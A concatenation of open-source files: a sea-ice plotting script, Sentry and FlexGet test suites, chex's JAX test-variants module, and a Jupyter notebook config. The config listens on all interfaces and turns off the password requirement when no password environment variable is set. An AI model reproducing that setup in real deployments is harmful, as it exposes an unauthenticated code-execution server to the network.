axis=1)
s_seaice = gbl_seaice.drop(['Day', 'Date',
'Month', 'Total Extent', 'N Extent'],
axis=1)
# Drop columns we don't need anymore
gbl_seaice.drop(['Day', 'Date',
'Month', 'S Extent', 'N Extent'],
axis=1, inplace=True)
# Set titles
gt = r'\textbf{NSIDC Global Sea Ice Extent (1979-%s)}' % cur_year
nt = r'\textbf{NSIDC Arctic Sea Ice Extent (1979-%s)}' % cur_year
st = r'\textbf{NSIDC Antarctic Sea Ice Extent (1979-%s)}' % cur_year
# Set column names
gc = 'Total Extent'
nc = 'N Extent'
sc = 'S Extent'
# Set filename bases
gf = 'global_sea_ice'
nf = 'arctic_sea_ice'
sf = 'antarctic_sea_ice'
# Plot both the dark and light versions of the graphs
plot(gbl_seaice, column=gc, suptitle=gt, filebase=gf, light_style=True,
png=True, infotext='top')
plot(gbl_seaice, column=gc, suptitle=gt, filebase=gf, light_style=False,
png=True, infotext='top')
plot(n_seaice, column=nc, suptitle=nt, filebase=nf, light_style=True,
png=True, ymin=0, ymax=18, legend_loc='upper right')
plot(n_seaice, column=nc, suptitle=nt, filebase=nf, light_style=False,
png=True, ymin=0, ymax=18, legend_loc='upper right')
plot(s_seaice, column=sc, suptitle=st, filebase=sf, light_style=True,
png=True, ymin=0, ymax=22, infotext='top')
plot(s_seaice, column=sc, suptitle=st, filebase=sf, light_style=False,
png=True, ymin=0, ymax=22, infotext='top')
# Gets CLI arguments and sets up logging to stderr
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-v', '--verbose', action="count", dest="verbose",
default=2,
help="Increase the verbosity. "
"Use twice for extra effect")
parser.add_argument('-q', '--quiet', action="count", dest="quiet",
default=0,
help="Decrease the verbosity. "
"Use twice for extra effect")
args = parser.parse_args()
# Set up clean logging to stderr
log_levels = [logging.CRITICAL, logging.ERROR, logging.WARNING,
logging.INFO, logging.DEBUG]
args.verbose = min(args.verbose - args.quiet, len(log_levels) - 1)
args.verbose = max(args.verbose, 0)
logging.basicConfig(level=log_levels[args.verbose],
format='%(levelname)s: %(message)s')
# Call main function
main()
|
{
"content_hash": "712036302677063026a47b871d77101d",
"timestamp": "",
"source": "github",
"line_count": 571,
"max_line_length": 97,
"avg_line_length": 34.57092819614711,
"alnum_prop": 0.5744174265450861,
"repo_name": "emmatoday/PyClimateGraphs",
"id": "df7e548fad5fe977cd80212b7fa34ba004568ea1",
"size": "19763",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SeaIce_Combined.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "490053"
},
{
"name": "Python",
"bytes": "19763"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from django.test.client import RequestFactory
from sentry.testutils.helpers.datetime import iso_format, before_now
from tests.apidocs.util import APIDocsTestCase
class ProjectGroupEventBase(APIDocsTestCase):
def setUp(self):
first_release = {
"firstEvent": before_now(minutes=3),
"lastEvent": before_now(minutes=2, seconds=30),
}
last_release = {
"firstEvent": before_now(minutes=1, seconds=30),
"lastEvent": before_now(minutes=1),
}
for timestamp in first_release.values():
self.create_event("a", release="1.0", timestamp=iso_format(timestamp))
self.create_event("b", release="1.1")
for timestamp in last_release.values():
event = self.create_event("c", release="1.0a", timestamp=iso_format(timestamp))
self.group_id = event.group.id
self.login_as(user=self.user)
class ProjectGroupEventsDocs(ProjectGroupEventBase):
def setUp(self):
super(ProjectGroupEventsDocs, self).setUp()
self.url = u"/api/0/issues/{}/events/".format(self.group_id)
def test_get(self):
response = self.client.get(self.url)
request = RequestFactory().get(self.url)
self.validate_schema(request, response)
class ProjectGroupEventsLatestDocs(ProjectGroupEventBase):
def setUp(self):
super(ProjectGroupEventsLatestDocs, self).setUp()
self.url = u"/api/0/issues/{}/events/latest/".format(self.group_id)
def test_get(self):
response = self.client.get(self.url)
request = RequestFactory().get(self.url)
self.validate_schema(request, response)
class ProjectGroupEventsOldestDocs(ProjectGroupEventBase):
def setUp(self):
super(ProjectGroupEventsOldestDocs, self).setUp()
self.url = u"/api/0/issues/{}/events/oldest/".format(self.group_id)
def test_get(self):
response = self.client.get(self.url)
request = RequestFactory().get(self.url)
self.validate_schema(request, response)
|
{
"content_hash": "e2d2b37c771fd291bbecb0aa7985d6c4",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 91,
"avg_line_length": 32.2,
"alnum_prop": 0.6583850931677019,
"repo_name": "beeftornado/sentry",
"id": "42fad78018cf7f51ee2557737ed20343a0d6f891",
"size": "2118",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/apidocs/endpoints/events/test_group_events.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "157195"
},
{
"name": "HTML",
"bytes": "197026"
},
{
"name": "JavaScript",
"bytes": "380379"
},
{
"name": "Makefile",
"bytes": "2832"
},
{
"name": "Python",
"bytes": "6473603"
}
],
"symlink_target": ""
}
|
import pytest
@pytest.mark.online
class TestRadarrListActions:
config = """
templates:
global:
disable: [seen]
tasks:
clear_and_add_to_radarr_list:
list_clear:
what:
- radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
mock:
- { title: 'Despicable Me 2 (2013)', imdb_id: 'tt1690953', tmdb_id: 93456 }
- { title: 'Sinister 2 (2015)', imdb_id: 'tt2752772', tmdb_id: 283445 }
- { title: 'Crimson Peak (2015)', imdb_id: 'tt2554274', tmdb_id: 201085 }
- { title: 'Deadpool (2016)', imdb_id: 'tt1431045', tmdb_id: 293660 }
accept_all: yes
list_add:
- radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
radarr_list_as_input_plugin:
radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
include_data: True
accept_all: yes
remove_from_radarr_list:
mock:
- { title: "Ocean\'s Twelve (2004)", imdb_id: 'tt0349903', tmdb_id: 163 }
- { title: 'Sinister 2 (2015)', imdb_id: 'tt2752772', tmdb_id: 283445 }
accept_all: yes
list_remove:
- radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
match_radarr_list:
mock:
- { title: 'Despicable.Me.2.2013.1080p.BluRay.x264-FlexGet', imdb_id: 'tt1690953', tmdb_id: 93456 }
- { title: 'Sinister.2.2015.720p.BluRay.x264-FlexGet', imdb_id: 'tt2752772', tmdb_id: 283445 }
- { title: 'Crimson.Peak.2015.720p.BluRay.x264-FlexGet', imdb_id: 'tt2554274', tmdb_id: 201085 }
- { title: 'Deadpool.2016.1080p.BluRay.x264-FlexGet', imdb_id: 'tt1431045', tmdb_id: 293660 }
- { title: 'Kung.Fu.Panda.3.2016.720p.BluRay.x264-FlexGet', imdb_id: 'tt2267968', tmdb_id: 140300 }
list_match:
from:
- radarr_list:
base_url: http://127.0.0.1
api_key: d2bcc5ec0c894b9587b6fbc3ff6ec11e
port: 7878
"""
    # TODO: each action should be its own test case
def test_radarr_list_actions(self, execute_task):
# Begin by clearing and then adding a bunch of movies
task = execute_task('clear_and_add_to_radarr_list')
# By using the list as the input we verify that the
# movies added above is returned to us
task = execute_task('radarr_list_as_input_plugin')
assert task.find_entry(
movie_name='Despicable Me 2'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Crimson Peak'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Deadpool'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Sinister 2'
), "movie should have been present in the list but it wasn't"
# Now we will attempt to remove one existing (Sinister 2) and one
# non-existing movie which should not affect anything at all
task = execute_task('remove_from_radarr_list')
# And to verify the list we fetch the list again
# Sinister 2 should now be missing
task = execute_task('radarr_list_as_input_plugin')
assert task.find_entry(
movie_name='Despicable Me 2'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Crimson Peak'
), "movie should have been present in the list but it wasn't"
assert task.find_entry(
movie_name='Deadpool'
), "movie should have been present in the list but it wasn't"
assert not task.find_entry(
movie_name='Sinister 2'
), "movie should not be present in the list but it was"
# Now we will try to match a bunch of input entries with
# the list. Two of the movies should not have been matched.
task = execute_task('match_radarr_list')
assert task.find_entry(
'accepted', title='Despicable.Me.2.2013.1080p.BluRay.x264-FlexGet'
), "movie should have been matched but it wasn't"
assert task.find_entry(
'accepted', title='Crimson.Peak.2015.720p.BluRay.x264-FlexGet'
), "movie should have been matched but it wasn't"
assert task.find_entry(
'accepted', title='Deadpool.2016.1080p.BluRay.x264-FlexGet'
), "movie should have been matched but it wasn't"
assert task.find_entry(
'undecided', title='Sinister.2.2015.720p.BluRay.x264-FlexGet'
), "movie should not have been matched but it was"
assert task.find_entry(
'undecided', title='Kung.Fu.Panda.3.2016.720p.BluRay.x264-FlexGet'
), "movie should not have been matched but it was"
# list_match should have removed all the matched movies
# so no movies should remain
task = execute_task('radarr_list_as_input_plugin')
assert len(task.all_entries) == 0, "there should be no movies left in the list"
|
{
"content_hash": "09175d45b4d6c0fdd391f832c987106f",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 113,
"avg_line_length": 44.41732283464567,
"alnum_prop": 0.5708207764580748,
"repo_name": "ianstalk/Flexget",
"id": "4a2ace0890887f711df843afbad5070ef23a0389",
"size": "5641",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "flexget/tests/test_radarr_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "56725"
},
{
"name": "HTML",
"bytes": "35670"
},
{
"name": "JavaScript",
"bytes": "455222"
},
{
"name": "Python",
"bytes": "2063551"
}
],
"symlink_target": ""
}
|
"""Chex variants utilities."""
import enum
import functools
import inspect
import itertools
from typing import Any, Sequence
import unittest
from absl import flags
from absl.testing import parameterized
from chex._src import fake
from chex._src import pytypes
import jax
from jax import tree_util
import jax.numpy as jnp
import toolz
FLAGS = flags.FLAGS
flags.DEFINE_bool(
"chex_skip_pmap_variant_if_single_device", True,
"Whether to skip pmap variant if only one device is available.")
# We choose to subclass instead of a simple alias, as Python doesn't allow
# multiple inheritance from the same class, and users may want to subclass their
# tests from both `chex.TestCase` and `parameterized.TestCase`.
#
# User is free to use any base class that supports generators unrolling
# instead of `variants.TestCase` or `parameterized.TestCase`. If a base class
# doesn't support this feature variant test fails with a corresponding error.
class TestCase(parameterized.TestCase):
"""A class for Chex tests that use variants.
See the docstring for ``chex.variants`` for more information.
Note: ``chex.variants`` returns a generator producing one test per variant.
Therefore, the used test class must support dynamic unrolling of these
generators during module import. It is implemented (and battle-tested) in
``absl.parameterized.TestCase``, and here we subclass from it.
"""
def variant(self, *args, **kwargs):
"""Raises a RuntimeError if not overriden or redefined."""
raise RuntimeError(
"self.variant is not defined: forgot to wrap a test in @chex.variants?")
class ChexVariantType(enum.Enum):
"""An enumeration of available Chex variants.
Use ``self.variant.type`` to get type of the current test variant.
See the docstring of ``chex.variants`` for more information.
"""
WITH_JIT = 1
WITHOUT_JIT = 2
WITH_DEVICE = 3
WITHOUT_DEVICE = 4
WITH_PMAP = 5
def __str__(self) -> str:
return "_" + self.name.lower()
tree_map = tree_util.tree_map
def params_product(*params_lists: Sequence[Sequence[Any]],
named: bool = False) -> Sequence[Sequence[Any]]:
"""Generates a cartesian product of `params_lists`.
See tests from ``variants_test.py`` for examples of usage.
Args:
*params_lists: A list of params combinations.
named: Whether to generate test names (for
`absl.parameterized.named_parameters(...)`).
Returns:
A cartesian product of `params_lists` combinations.
"""
def generate():
for combination in itertools.product(*params_lists):
if named:
name = "_".join(t[0] for t in combination)
args_tuples = (t[1:] for t in combination)
args = sum(args_tuples, ())
yield (name, *args)
else:
yield sum(combination, ())
return list(generate())
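# Example with hypothetical values (not from the original module):
#   params_product([("a", 1), ("b", 2)], [("x", 10), ("y", 20)], named=True)
# returns
#   [("a_x", 1, 10), ("a_y", 1, 20), ("b_x", 2, 10), ("b_y", 2, 20)]
# which can be unpacked into `parameterized.named_parameters(*...)`.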
def count_num_calls(fn):
"""Counts the number of times the function was called."""
num_calls = 0
@functools.wraps(fn)
def fn_wrapped(*args, **kwargs):
nonlocal num_calls
num_calls += 1
return fn(*args, **kwargs)
return fn_wrapped, lambda: num_calls
class VariantsTestCaseGenerator:
"""TestCase generator for chex variants. Supports sharding."""
def __init__(self, test_object, which_variants):
self._which_variants = which_variants
self._generated_names_freq = {}
if hasattr(test_object, "__iter__"):
# `test_object` is a generator (e.g. parameterised test).
self._test_methods = list(test_object)
else:
# `test_object` is a single test method.
self._test_methods = [test_object]
def add_variants(self, which_variants):
"""Merge variants."""
for var, incl in which_variants.items():
self._which_variants[var] = self._which_variants.get(var, False) or incl
@property
def __name__(self):
msg = ("A test wrapper attempts to access __name__ of "
"VariantsTestCaseGenerator. Usually, this happens when "
"@parameterized wraps @variants.variants. Make sure that the "
"@variants.variants wrapper is an outer one, i.e. nothing wraps it.")
raise RuntimeError(msg)
def __call__(self):
msg = ("A test wrapper attempts to invoke __call__ of "
"VariantsTestCaseGenerator: make sure that all `TestCase` instances "
"that use variants inherit from `chex.TestCase`.")
raise RuntimeError(msg)
def _set_test_name(self, test_method, variant):
"""Set a name for the generated test."""
name = getattr(test_method, "__name__", "")
params_repr = getattr(test_method, "__x_params_repr__", "")
chex_suffix = f"{variant}"
candidate_name = "_".join(filter(None, [name, params_repr, chex_suffix]))
name_freq = self._generated_names_freq.get(candidate_name, 0)
if name_freq:
# Ensure that test names are unique.
new_name = name + "_" + str(name_freq)
unique_name = "_".join(filter(None, [new_name, params_repr, chex_suffix]))
else:
unique_name = candidate_name
self._generated_names_freq[candidate_name] = name_freq + 1
# Always use name for compatibility with `absl.testing.parameterized`.
setattr(test_method, "__name__", unique_name)
setattr(test_method, "__x_params_repr__", "")
setattr(test_method, "__x_use_name__", True)
return test_method
def _inner_iter(self, test_method):
"""Generate chex variants for a single test."""
def make_test(variant: ChexVariantType):
@functools.wraps(test_method)
def test(self, *args, **kwargs):
# Skip pmap variant if only one device is available.
if (variant is ChexVariantType.WITH_PMAP and
FLAGS["chex_skip_pmap_variant_if_single_device"].value and
jax.device_count() < 2):
raise unittest.SkipTest(
f"Only 1 device is available ({jax.devices()}).")
# n_cpu_devices assert.
if FLAGS["chex_assert_multiple_cpu_devices"].value:
required_n_cpus = fake.get_n_cpu_devices_from_xla_flags()
if required_n_cpus < 2:
raise RuntimeError(
f"Required number of CPU devices is {required_n_cpus} < 2."
"Consider setting up your test module to use multiple CPU "
" devices (see README.md) or disabling "
"`chex_assert_multiple_cpu_devices` flag.")
available_n_cpus = jax.device_count("cpu")
if required_n_cpus != available_n_cpus:
raise RuntimeError(
"Number of available CPU devices is not equal to the required: "
f"{available_n_cpus} != {required_n_cpus}")
# Set up the variant.
self.variant, num_calls = count_num_calls(_variant_decorators[variant])
self.variant.type = variant
res = test_method(self, *args, **kwargs)
if num_calls() == 0:
raise RuntimeError(
"Test is wrapped in @chex.variants, but never calls self.variant."
" Consider debugging the test or removing @chex.variants wrapper."
f" (variant: {variant})")
return res
self._set_test_name(test, variant)
return test
selected_variants = [
var_name for var_name, is_included in self._which_variants.items()
if is_included
]
if not selected_variants:
raise ValueError(f"No variants selected for test: {test_method}.")
return (make_test(var_name) for var_name in selected_variants)
def __iter__(self):
"""Generate chex variants for each test case."""
return itertools.chain(*(self._inner_iter(m) for m in self._test_methods))
@toolz.curry
def _variants_fn(test_object, **which_variants) -> VariantsTestCaseGenerator:
"""Implements `variants` and `all_variants`."""
# Convert keys to enum entries.
which_variants = {
ChexVariantType[name.upper()]: var
for name, var in which_variants.items()
}
if isinstance(test_object, VariantsTestCaseGenerator):
# Merge variants for nested wrappers.
test_object.add_variants(which_variants)
else:
test_object = VariantsTestCaseGenerator(test_object, which_variants)
return test_object
@toolz.curry
# pylint: disable=redefined-outer-name
def variants(test_method,
with_jit: bool = False,
without_jit: bool = False,
with_device: bool = False,
without_device: bool = False,
with_pmap: bool = False) -> VariantsTestCaseGenerator:
# pylint: enable=redefined-outer-name
"""Decorates a test to expose Chex variants.
The decorated test has access to a decorator called ``self.variant``, which
may be applied to functions to test different JAX behaviors. Consider:
.. code-block:: python
@chex.variants(with_jit=True, without_jit=True)
def test(self):
@self.variant
def f(x, y):
return x + y
self.assertEqual(f(1, 2), 3)
In this example, the function ``test`` will be called twice: once with `f`
jitted (i.e. using `jax.jit`) and another where `f` is not jitted.
Variants `with_jit=True` and `with_pmap=True` accept additional specific to
them arguments. Example:
.. code-block:: python
@chex.variants(with_jit=True)
def test(self):
@self.variant(static_argnums=(1,))
def f(x, y):
# `y` is not traced.
return x + y
self.assertEqual(f(1, 2), 3)
Variant `with_pmap=True` also accepts `broadcast_args_to_devices`
(whether to broadcast each input argument to all participating devices),
`reduce_fn` (a function to apply to results of pmapped `fn`), and
`n_devices` (number of devices to use in the `pmap` computation).
See the docstring of `_with_pmap` for more details (including default values).
If used with ``absl.testing.parameterized``, `@chex.variants` must wrap it:
.. code-block:: python
@chex.variants(with_jit=True, without_jit=True)
@parameterized.named_parameters('test', *args)
def test(self, *args):
...
Tests that use this wrapper must be inherited from ``parameterized.TestCase``.
For more examples see ``variants_test.py``.
Args:
test_method: A test method to decorate.
with_jit: Whether to test with `jax.jit`.
without_jit: Whether to test without `jax.jit`. Any jit compilation done
within the test method will not be affected.
with_device: Whether to test with args placed on device, using
`jax.device_put`.
without_device: Whether to test with args (explicitly) not placed on device,
using `jax.device_get`.
with_pmap: Whether to test with `jax.pmap`, with computation duplicated
across devices.
Returns:
A decorated ``test_method``.
"""
return _variants_fn(
test_method,
with_jit=with_jit,
without_jit=without_jit,
with_device=with_device,
without_device=without_device,
with_pmap=with_pmap)
@toolz.curry
# pylint: disable=redefined-outer-name
def all_variants(test_method,
with_jit: bool = True,
without_jit: bool = True,
with_device: bool = True,
without_device: bool = True,
with_pmap: bool = True) -> VariantsTestCaseGenerator:
# pylint: enable=redefined-outer-name
"""Equivalent to ``chex.variants`` but with flipped defaults."""
return _variants_fn(
test_method,
with_jit=with_jit,
without_jit=without_jit,
with_device=with_device,
without_device=without_device,
with_pmap=with_pmap)
def check_variant_arguments(variant_fn):
"""Raises `ValueError` if `variant_fn` got an unknown argument."""
@functools.wraps(variant_fn)
def wrapper(*args, **kwargs):
unknown_args = set(kwargs.keys()) - _valid_kwargs_keys
if unknown_args:
raise ValueError(f"Unknown arguments in `self.variant`: {unknown_args}.")
return variant_fn(*args, **kwargs)
return wrapper
@toolz.curry
@check_variant_arguments
def _with_jit(fn,
static_argnums=None,
static_argnames=None,
device=None,
backend=None,
**unused_kwargs):
"""Variant that applies `jax.jit` to fn."""
return jax.jit(
fn,
static_argnums=static_argnums,
static_argnames=static_argnames,
device=device,
backend=backend)
@toolz.curry
@check_variant_arguments
def _without_jit(fn, **unused_kwargs):
"""Variant that does not apply `jax.jit` to a fn (identity)."""
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return fn(*args, **kwargs)
return wrapper
@toolz.curry
@check_variant_arguments
def _with_device(fn, ignore_argnums=(), static_argnums=(), **unused_kwargs):
"""Variant that applies `jax.device_put` to the args of fn."""
if isinstance(ignore_argnums, int):
ignore_argnums = (ignore_argnums,)
if isinstance(static_argnums, int):
static_argnums = (static_argnums,)
@functools.wraps(fn)
def wrapper(*args, **kwargs):
def put(x):
try:
return jax.device_put(x)
except TypeError: # not a valid JAX type
return x
device_args = [
arg if (idx in ignore_argnums or idx in static_argnums) else tree_map(
put, arg) for idx, arg in enumerate(args)
]
device_kwargs = tree_map(put, kwargs)
return fn(*device_args, **device_kwargs)
return wrapper
@toolz.curry
@check_variant_arguments
def _without_device(fn, **unused_kwargs):
"""Variant that applies `jax.device_get` to the args of fn."""
@functools.wraps(fn)
def wrapper(*args, **kwargs):
def get(x):
if isinstance(x, jax.Array):
return jax.device_get(x)
return x
no_device_args = tree_map(get, args)
no_device_kwargs = tree_map(get, kwargs)
return fn(*no_device_args, **no_device_kwargs)
return wrapper
@toolz.curry
@check_variant_arguments
def _with_pmap(fn,
broadcast_args_to_devices=True,
reduce_fn="first_device_output",
n_devices=None,
axis_name="i",
devices=None,
in_axes=0,
static_broadcasted_argnums=(),
static_argnums=(),
backend=None,
**unused_kwargs):
"""Variant that applies `jax.pmap` to fn.
Args:
fn: A function to wrap.
broadcast_args_to_devices: Whether to broadcast `fn` args to pmap format
(i.e. pmapped axes' sizes == a number of devices).
reduce_fn: A function to apply to outputs of `fn`.
n_devices: A number of devices to use (can specify a `backend` if required).
axis_name: An argument for `pmap`.
devices: An argument for `pmap`.
in_axes: An argument for `pmap`.
static_broadcasted_argnums: An argument for `pmap`.
static_argnums: An alias of ``static_broadcasted_argnums``.
backend: An argument for `pmap`.
**unused_kwargs: Unused kwargs (e.g. related to other variants).
Returns:
Wrapped `fn` that accepts `args` and `kwargs` and returns a superposition of
`reduce_fn` and `fn` applied to them.
Raises:
ValueError: If `broadcast_args_to_devices` used with `in_axes` or
`static_broadcasted_argnums`; if number of available devices is less than
required; if pmappable arg axes' sizes are not equal to the number of
devices.
SkipTest: If the flag ``chex_skip_pmap_variant_if_single_device`` is set and
there is only one device available.
"""
if (FLAGS["chex_skip_pmap_variant_if_single_device"].value and
jax.device_count() < 2):
raise unittest.SkipTest(f"Only 1 device is available ({jax.devices()}).")
if broadcast_args_to_devices and in_axes != 0:
raise ValueError(
"Do not use `broadcast_args_to_devices` when specifying `in_axes`.")
# Set up a reduce function.
if reduce_fn == "first_device_output":
reduce_fn = lambda t: tree_map(lambda x: x[0], t)
elif reduce_fn == "identity" or reduce_fn is None: # Identity.
reduce_fn = lambda t: t
if not static_argnums and static_argnums != 0:
static_argnums = static_broadcasted_argnums
if isinstance(static_argnums, int):
static_argnums = (static_argnums,)
pmap_kwargs = dict(
axis_name=axis_name,
devices=devices,
in_axes=in_axes,
static_broadcasted_argnums=static_argnums,
backend=backend)
pmapped_fn = jax.pmap(fn, **pmap_kwargs)
@functools.wraps(pmapped_fn)
def wrapper(*args: pytypes.ArrayTree, **kwargs: pytypes.ArrayTree):
if kwargs and (in_axes != 0 or static_argnums):
raise ValueError("Do not use kwargs with `in_axes` or `static_argnums` "
"in pmapped function.")
devices_ = list(devices or jax.devices(backend))
n_devices_ = n_devices or len(devices_)
devices_ = devices_[:n_devices_]
if len(devices_) != n_devices_:
raise ValueError("Number of available devices is less than required for "
f"test ({len(devices_)} < {n_devices_})")
bcast_fn = lambda x: jnp.broadcast_to(x, (n_devices_,) + jnp.array(x).shape)
if broadcast_args_to_devices:
args = [
tree_map(bcast_fn, arg) if idx not in static_argnums else arg
for idx, arg in enumerate(args)
]
kwargs = tree_map(bcast_fn, kwargs)
else:
# Pmappable axes size must be equal to number of devices.
in_axes_ = in_axes if isinstance(in_axes,
(tuple, list)) else [in_axes] * len(args)
is_pmappable_arg = [
idx not in static_argnums and in_axes_[idx] is not None
for idx in range(len(args))
]
      for arg_is_pmappable, arg in zip(is_pmappable_arg, args):
        if not arg_is_pmappable:
          continue
if not all(
x.shape[0] == n_devices_ for x in jax.tree_util.tree_leaves(arg)):
shapes = tree_map(jnp.shape, arg)
raise ValueError(
f"Pmappable arg axes size must be equal to number of devices, "
f"got: {shapes} (expected the first dim to be {n_devices_}). "
"Consider setting `broadcast_args_to_devices=True`.")
new_kwargs = dict(
axis_name=axis_name,
devices=devices_,
in_axes=in_axes,
static_broadcasted_argnums=static_argnums,
backend=backend)
# Re-compile fn if kwargs changed.
nonlocal pmap_kwargs
nonlocal pmapped_fn
if new_kwargs != pmap_kwargs:
pmap_kwargs = new_kwargs
pmapped_fn = jax.pmap(fn, **pmap_kwargs)
res = pmapped_fn(*args, **kwargs)
return reduce_fn(res)
return wrapper
_variant_decorators = dict({
ChexVariantType.WITH_JIT: _with_jit,
ChexVariantType.WITHOUT_JIT: _without_jit,
ChexVariantType.WITH_DEVICE: _with_device,
ChexVariantType.WITHOUT_DEVICE: _without_device,
ChexVariantType.WITH_PMAP: _with_pmap,
})
class Variant:
"""Variant class for typing and string representation."""
def __init__(self, name, fn):
self._fn = fn
self._name = name
def __repr__(self):
return self._name
def __call__(self, *args, **kwargs):
# Could apply decorators (currying, arg-checking) here
return self._fn(*args, **kwargs)
# Expose variant objects.
without_device = Variant("chex_without_device", _without_device)
without_jit = Variant("chex_without_jit", _without_jit)
with_device = Variant("chex_with_device", _with_device)
with_jit = Variant("chex_with_jit", _with_jit)
with_pmap = Variant("chex_with_pmap", _with_pmap)
ALL_VARIANTS = (without_device, without_jit, with_device, with_jit, with_pmap)
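# Illustrative sketch (not part of the original module): the exposed Variant
# objects can also be applied directly, outside a `chex.TestCase`, e.g.
#   add = with_jit(lambda x, y: x + y)   # returns the function wrapped in jax.jit
#   add(1, 2)                            # == 3
# `without_jit`, `with_device`, etc. wrap a function in the same way.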
# Collect valid argument names from all variant decorators.
_valid_kwargs_keys = set()
for fn_ in _variant_decorators.values():
original_fn = fn_.func.__wrapped__
_valid_kwargs_keys.update(inspect.getfullargspec(original_fn).args)
|
{
"content_hash": "d4b9aa6288ec3af62cd17a8cb3016a89",
"timestamp": "",
"source": "github",
"line_count": 596,
"max_line_length": 80,
"avg_line_length": 33.14093959731544,
"alnum_prop": 0.6479343863912516,
"repo_name": "deepmind/chex",
"id": "f067ebbb3504589a8743157ba88393f2ff52de76",
"size": "20448",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "chex/_src/variants.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "295381"
},
{
"name": "Shell",
"bytes": "2675"
}
],
"symlink_target": ""
}
|
c.NotebookApp.ip = '0.0.0.0'
## Supply extra arguments that will be passed to Jinja environment.
#c.NotebookApp.jinja_environment_options = {}
## Extra variables to supply to jinja templates when rendering.
#c.NotebookApp.jinja_template_vars = {}
## The kernel manager class to use.
#c.NotebookApp.kernel_manager_class = 'notebook.services.kernels.kernelmanager.MappingKernelManager'
## The kernel spec manager class to use. Should be a subclass of
# `jupyter_client.kernelspec.KernelSpecManager`.
#
# The API of KernelSpecManager is provisional and might change without warning
# between this version of Jupyter and the next stable one.
#c.NotebookApp.kernel_spec_manager_class = 'jupyter_client.kernelspec.KernelSpecManager'
## The full path to a private key file for usage with SSL/TLS.
#c.NotebookApp.keyfile = ''
## The login handler class to use.
#c.NotebookApp.login_handler_class = 'notebook.auth.login.LoginHandler'
## The logout handler class to use.
#c.NotebookApp.logout_handler_class = 'notebook.auth.logout.LogoutHandler'
## The MathJax.js configuration file that is to be used.
#c.NotebookApp.mathjax_config = 'TeX-AMS-MML_HTMLorMML-full,Safe'
## A custom url for MathJax.js. Should be in the form of a case-sensitive url to
# MathJax, for example: /static/components/MathJax/MathJax.js
#c.NotebookApp.mathjax_url = ''
## Dict of Python modules to load as notebook server extensions. Entry values can
# be used to enable and disable the loading of the extensions. The extensions
# will be loaded in alphabetical order.
#c.NotebookApp.nbserver_extensions = {}
## The directory to use for notebooks and kernels.
#c.NotebookApp.notebook_dir = ''
## Whether to open in a browser after starting. The specific browser used is
# platform dependent and determined by the python standard library `webbrowser`
# module, unless it is overridden using the --browser (NotebookApp.browser)
# configuration option.
#c.NotebookApp.open_browser = True
## Hashed password to use for web authentication.
#
# To generate, type in a python/IPython shell:
#
# from notebook.auth import passwd; passwd()
#
# The string should be of the form type:salt:hashed-password.
## Forces users to use a password for the Notebook server. This is useful in a
# multi-user environment, for instance when everybody in the LAN can access each
# other's machine through ssh.
#
# In such a case, serving the notebook server on localhost is not secure since
# any user can connect to the notebook server via ssh.
c.NotebookApp.password_required = True
#
# Look for password in environment. This is the user's plaintext password. Not for prod use
import os
if os.environ.get('AGAVE_PASSWORD'):
#
# hash the plaintext password here
from notebook.auth import passwd
agavePassHash = passwd(os.environ.get('AGAVE_PASSWORD'))
c.NotebookApp.password = agavePassHash
elif os.environ.get('AGAVE_PASSWORD_HASH'):
agavePassHash = os.environ.get('AGAVE_PASSWORD_HASH');
c.NotebookApp.password = agavePassHash
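#
# Illustrative only: the value assigned to c.NotebookApp.password is the string
# returned by passwd(), of the form 'algorithm:salt:hashed-password' (e.g. a
# 'sha1:...' prefix on older notebook versions); it is never the plaintext.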
#
# # No password in the env, so look for an agave username to look up the docker secret
# elif os.environ.get('AGAVE_USERNAME'):
#
# # secret will be filed under the training/<username>/hash path
# secretFilePath = print "/run/secrets/training/{}/hash" os.environ.get('AGAVE_USERNAME');
#
# # if it exists, read the contents and use that
# if os.path.isfile(secretFilePath):
#
# f = open(secretFilePath,'r',encoding = 'utf-8')
# agavePassHash = f.read()
#
# # If the value is not empty use that
# if agavePassHash:
# c.NotebookApp.password = agavePassHash
#
# # otherwise do not require password
# else:
# c.NotebookApp.password_required = False
#
# # no secret file and no password or hash in environment.
# # we won't require password as we have none to use
# else
# c.NotebookApp.password_required = False
#
# # no username and no password or hash in environment.
# # we won't require password as we have none to use
else:
c.NotebookApp.password_required = False
## The port the notebook server will listen on.
c.NotebookApp.port = 8888
## The number of additional ports to try if the specified port is not available.
#c.NotebookApp.port_retries = 50
## DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
#c.NotebookApp.pylab = 'disabled'
## (sec) Time window used to check the message and data rate limits.
#c.NotebookApp.rate_limit_window = 3
## Reraise exceptions encountered loading server extensions?
#c.NotebookApp.reraise_server_extension_failures = False
## DEPRECATED use the nbserver_extensions dict instead
#c.NotebookApp.server_extensions = []
## The session manager class to use.
#c.NotebookApp.session_manager_class = 'notebook.services.sessions.sessionmanager.SessionManager'
## Supply SSL options for the tornado HTTPServer. See the tornado docs for
# details.
#c.NotebookApp.ssl_options = {}
